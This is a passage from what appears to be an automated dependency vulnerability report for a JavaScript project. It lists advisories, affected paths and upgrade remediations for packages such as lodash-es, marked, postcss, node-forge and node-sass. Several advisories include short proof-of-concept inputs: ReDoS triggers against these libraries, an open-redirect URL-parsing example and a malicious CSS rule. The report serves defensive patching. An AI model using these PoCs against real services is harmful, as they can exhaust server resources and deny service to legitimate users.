The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade loader-utils
to version 1.4.2, 2.0.4, 3.2.1 or higher.
References
medium severity
- Vulnerable module: lodash-es
- Introduced through: rete-context-menu-plugin@0.6.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rete-context-menu-plugin@0.6.0 › lodash-es@4.17.15Remediation: Upgrade to rete-context-menu-plugin@2.0.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber
, trim
and trimEnd
functions.
POC
var lo = require('lodash');
function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}
var s = build_blank(50000)
var time0 = Date.now();
lo.trim(s)
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0)
var time1 = Date.now();
lo.toNumber(s)
var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1)
var time2 = Date.now();
lo.trimEnd(s)
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2)
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade lodash-es
to version 4.17.21 or higher.
References
medium severity
- Vulnerable module: marked
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › marked@0.7.0Remediation: Upgrade to firebase-tools@10.1.2.
Overview
marked is a low-level compiler for parsing markdown without caching or blocking for long periods of time.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when passing unsanitized user input to inline.reflinkSearch
, if it is not being parsed by a time-limited worker thread.
PoC
import * as marked from 'marked';
console.log(marked.parse(`[x]: x
\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](`));
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade marked
to version 4.0.10 or higher.
References
medium severity
- Vulnerable module: marked
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › marked@0.7.0Remediation: Upgrade to firebase-tools@10.1.2.
Overview
marked is a low-level compiler for parsing markdown without caching or blocking for long periods of time.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when unsanitized user input is passed to block.def
.
PoC
import * as marked from "marked";
marked.parse(`[x]:${' '.repeat(1500)}x ${' '.repeat(1500)} x`);
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade marked
to version 4.0.10 or higher.
References
medium severity
- Vulnerable module: node-forge
- Introduced through: firebase-admin@9.12.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › node-forge@0.10.0Remediation: Upgrade to firebase-admin@10.0.2.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Open Redirect via parseUrl
function when it mishandles certain uses of backslash such as https:/\/\/\
and interprets the URI as a relative path.
PoC:
// poc.js
var forge = require("node-forge");
var url = forge.util.parseUrl("https:/\/\/\www.github.com/foo/bar");
console.log(url);
// Output of node poc.js:
{
full: 'https://',
scheme: 'https',
host: '',
port: 443,
path: '/www.github.com/foo/bar', <<<---- path should be "/foo/bar"
fullHost: ''
}
Remediation
Upgrade node-forge
to version 1.0.0 or higher.
References
medium severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0Remediation: Upgrade to node-sass@7.0.0.
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to Improper Certificate Validation. Certificate validation is disabled by default when requesting binaries, even if the user is not specifying an alternative download path.
Remediation
Upgrade node-sass
to version 7.0.0 or higher.
References
medium severity
- Vulnerable module: postcss
- Introduced through: rollup-plugin-vue@4.7.2
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler-utils@2.6.0 › postcss@7.0.39Remediation: Upgrade to rollup-plugin-vue@5.0.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › @vue/component-compiler-utils@2.6.0 › postcss@7.0.39Remediation: Upgrade to rollup-plugin-vue@5.0.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › postcss@5.2.18
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › postcss-modules-local-by-default@1.2.0 › postcss@6.0.23
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › postcss-modules-scope@1.1.0 › postcss@6.0.23
…and 2 more
Overview
postcss is a PostCSS is a tool for transforming styles with JS plugins.
Affected versions of this package are vulnerable to Improper Input Validation when parsing external Cascading Style Sheets (CSS) with linters using PostCSS. An attacker can cause discrepancies by injecting malicious CSS rules, such as @font-face{ font:(\r/*);}
.
This vulnerability is because of an insecure regular expression usage in the RE_BAD_BRACKET
variable.
Remediation
Upgrade postcss
to version 8.4.31 or higher.
References
medium severity
- Vulnerable module: postcss
- Introduced through: rollup-plugin-vue@4.7.2
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › postcss@5.2.18
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › postcss-modules-local-by-default@1.2.0 › postcss@6.0.23
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › postcss-modules-scope@1.1.0 › postcss@6.0.23
Overview
postcss is a PostCSS is a tool for transforming styles with JS plugins.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL()
and loadAnnotation()
in lib/previous-map.js
. The vulnerable regexes are caused mainly by the sub-pattern \/\*\s*# sourceMappingURL=(.*)
.
PoC
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
// postcss.parse('a{}/*# sourceMappingURL=a.css.map */')
for(var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
try{
postcss.parse(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
}
catch(e){
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
}
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade postcss
to version 8.2.13, 7.0.36 or higher.
References
medium severity
- Vulnerable module: scss-tokenizer
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › sass-graph@2.2.5 › scss-tokenizer@0.2.3Remediation: Upgrade to node-sass@7.0.2.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the loadAnnotation()
function, due to the usage of insecure regex.
PoC
var scss = require("scss-tokenizer")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
// postcss.parse('a{}/*# sourceMappingURL=a.css.map */')
for(var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
try{
scss.tokenize(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
}
catch(e){
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
}
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade scss-tokenizer
to version 0.4.3 or higher.
References
medium severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to NULL Pointer Dereference via Sass::Parser::parseCompoundSelector
in parser_selectors.cpp
. Note: node-sass
is affected by this vulnerability due to its bundled usage of the libsass
package.
Remediation
There is no fixed version for node-sass
.
References
medium severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to Out-of-bounds Read via Sass::weaveParents
in ast_sel_weave.cpp
. Note: node-sass
is affected by this vulnerability due to its bundled usage of the libsass
package.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
There is no fixed version for node-sass
.
References
medium severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to Uncontrolled Recursion via Sass::Eval::operator()(Sass::Binary_Expression*)
in eval.cpp
. Note: node-sass
is affected by this vulnerability due to its bundled usage of the libsass
package.
Details
A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
There is no fixed version for node-sass
.
References
medium severity
- Vulnerable module: @google-cloud/firestore
- Introduced through: firebase-admin@9.12.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › @google-cloud/firestore@4.15.1Remediation: Upgrade to firebase-admin@11.1.0.
Overview
@google-cloud/firestore is a Firestore Client Library for Node.js
Affected versions of this package are vulnerable to Insecure Storage of Sensitive Information. An attacker with logs read access can potentially read sensitive information exposed by developers that log objects through this._settings
, which could inadvertently log the firestore key.
Remediation
Upgrade @google-cloud/firestore
to version 6.2.0 or higher.
References
low severity
- Vulnerable module: firebase-tools
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3Remediation: Upgrade to firebase-tools@13.6.1.
Overview
firebase-tools is a Command-Line Interface for Firebase
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) via the export
endpoint. An attacker can issue calls against localhost
on the affected application by convincing a user to visit a malicious page using the emulator, and extract information from the application.
Remediation
Upgrade firebase-tools
to version 13.6.1 or higher.
References
low severity
- Vulnerable module: @vue/compiler-sfc
- Introduced through: vue@2.7.16 and rete-vue-render-plugin@0.5.2
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › vue@2.7.16 › @vue/compiler-sfc@2.7.16Remediation: Upgrade to vue@3.0.0.
-
